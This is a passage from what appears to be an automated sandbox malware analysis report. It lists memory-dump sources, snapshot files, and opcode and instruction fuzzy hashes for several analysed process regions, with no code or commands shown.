                                        • Instruction Fuzzy Hash: B8E0EC31758C084FAB84EA2C805DE6833D2EBAC75275501A5E00EC72B2DD24DD818741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1b8ad1e5504443bc580e48f4f6272715c430856667fda21c9a8e5c211784a68
                                        • Instruction ID: edd5dd38d2b0e9eb4139c50d5c233a857824427428402fe537c976f927005f1b
                                        • Opcode Fuzzy Hash: e1b8ad1e5504443bc580e48f4f6272715c430856667fda21c9a8e5c211784a68
                                        • Instruction Fuzzy Hash: 6BD09E31714C0C4FDF85FB18D454E5573D1EBB87017504469900DC72A5DE24DD85CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9baeb9b9a92bffc7554f216544d16626a7e13a99f1df08c081d96657f95aedc3
                                        • Instruction ID: b032f6eb29a5bd3002686bb378e94aadc9b7195dc89b1351c2ea6b4390120a88
                                        • Opcode Fuzzy Hash: 9baeb9b9a92bffc7554f216544d16626a7e13a99f1df08c081d96657f95aedc3
                                        • Instruction Fuzzy Hash: D9C04C01729E0D1E5194A59C385537927C2D79D4517C4167B941EC335AEC545C470282
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000039.00000002.4184221881.00007FFE18990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_57_2_7ffe18990000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: 33f67d08057266b0c37420ec56bc5ccd9448cb22076e5c2910c09d3455a49b05
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: 0CC08051ECDD1749FB94509660020FC7250BF0D331B4820FDC01F812B2DC4F19818645
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000003D.00000002.4178367256.00007FF65E491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF65E490000, based on PE: true
                                        • Associated: 0000003D.00000002.4178075968.00007FF65E490000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4179001180.00007FF65E497000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4179310513.00007FF65E499000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4179826039.00007FF65E49A000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4182135576.00007FF65E707000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4182341391.00007FF65E70D000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4183235769.00007FF65E983000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 0000003D.00000002.4183290670.00007FF65E985000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_61_2_7ff65e490000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: e4cca2c2fce67dfd066e7156d6a59f799101edf4b6e05dd51bc256ff772e8f42
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: C9B01232D0430F84EB002F01DB4235932606B2C780F450030E50CF3362CF7D68504B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]$u
                                        • API String ID: 0-4288194166
                                        • Opcode ID: 09a267ae10668e0f625e39f16f971e8915bee1aff7adc47ddc7fff3607bf6513
                                        • Instruction ID: 1ef056b42600baea9712022fb60a7b33cedf4523c84921d041a9e8591acf3ee0
                                        • Opcode Fuzzy Hash: 09a267ae10668e0f625e39f16f971e8915bee1aff7adc47ddc7fff3607bf6513
                                        • Instruction Fuzzy Hash: CCE1F43590CD598BE769DA19C8469F477E0EF46330F8401F9E05EC35B2EF286E068A98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#$u
                                        • API String ID: 0-988003089
                                        • Opcode ID: 5acb635d261692fc103af4335f8274726bc079aa7262bc6282a7b2d0313ddc4a
                                        • Instruction ID: 24b609170961717c17d18aab34e0df60593f77a98bd3353cfd56137d4d5d65bc
                                        • Opcode Fuzzy Hash: 5acb635d261692fc103af4335f8274726bc079aa7262bc6282a7b2d0313ddc4a
                                        • Instruction Fuzzy Hash: C4B1D035A1CE4D8FEB59EA28C845AF973E5FF96321F5001BAD04EC31A2DE35AD428744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: h_H
                                        • API String ID: 0-1605141047
                                        • Opcode ID: f67b58e2b6d40949cb591c4f5584176aed0f3389d7d0aa508817f8f7d2c80f1b
                                        • Instruction ID: 06e08588ac83e2cf6dea9c3756fd636d58b919377b75c5a28f2b664bc8adaf6d
                                        • Opcode Fuzzy Hash: f67b58e2b6d40949cb591c4f5584176aed0f3389d7d0aa508817f8f7d2c80f1b
                                        • Instruction Fuzzy Hash: E7F01271D2890F9EDF648B45D8415FD77F1FF48310F9001B9C11AE2191DB282E02C795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17f45493549191da9827fbf56f3d2f3f4a174141159b3d20824cefcb490a037c
                                        • Instruction ID: 7e7e9e1608fc180e326a1dd2e01f1534273a0686993a2f1ac0b1413bd9cbfe68
                                        • Opcode Fuzzy Hash: 17f45493549191da9827fbf56f3d2f3f4a174141159b3d20824cefcb490a037c
                                        • Instruction Fuzzy Hash: 9C41B635A0CE098FDB58DA19C8466E877D1FF44326F9002F9D45DC7572DB28AD178B84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6019375559ae934b74744ea855a43e8a813849bec75061f138892a958e6fc62f
                                        • Instruction ID: 3c38578b0d4a63d6dee2d74a4ac32a2cef08305fd7fc5a0103f4f2d8832bb425
                                        • Opcode Fuzzy Hash: 6019375559ae934b74744ea855a43e8a813849bec75061f138892a958e6fc62f
                                        • Instruction Fuzzy Hash: A5414A3061CA4A4FC705EB29C440DF5BBF2EFD6311F1886FAE489C716BDA29E9858741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ced65749d38f992aaf0344d8cc1d8465354eab28cd2bb96127f07377837a475
                                        • Instruction ID: fb4d78a80e953a28c183df7e207ad86ce593991a9276675c677e6742a17d7366
                                        • Opcode Fuzzy Hash: 0ced65749d38f992aaf0344d8cc1d8465354eab28cd2bb96127f07377837a475
                                        • Instruction Fuzzy Hash: 9931FD30248D4C8FDF89FB68C498E6537E1EFA930171441A9D44ACB6B6DE24ED85CB91
                                        Uniqueness
